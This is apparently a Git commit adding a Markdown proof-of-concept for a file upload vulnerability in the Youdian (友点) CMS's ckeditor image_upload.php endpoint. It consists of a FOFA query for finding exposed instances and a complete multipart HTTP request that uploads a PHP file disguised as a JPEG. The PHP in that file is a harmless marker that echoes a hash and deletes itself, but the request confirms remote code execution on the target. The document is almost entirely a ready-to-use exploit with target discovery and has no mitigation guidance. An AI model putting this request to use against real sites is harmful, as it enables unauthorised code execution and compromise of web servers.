Create 友点建站系统image_upload.php存在文件上传漏洞.md
This commit is contained in:
parent
a08a20a7de
commit
1958aa640d
27
友点建站系统image_upload.php存在文件上传漏洞.md
Normal file
27
友点建站系统image_upload.php存在文件上传漏洞.md
Normal file
@ -0,0 +1,27 @@
|
||||
## 友点建站系统image_upload.php存在文件上传漏洞
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="友点建站-CMS"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
Content-Length: 0
|
||||
|
||||
------WebKitFormBoundarydAPjrmyKewWuf59H
|
||||
Content-Disposition: form-data; name="files"; filename="ceshi.php"
|
||||
Content-Type: image/jpg
|
||||
|
||||
<?php echo md5('666');unlink(__FILE__);?>
|
||||
------WebKitFormBoundarydAPjrmyKewWuf59H--
|
||||
```
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user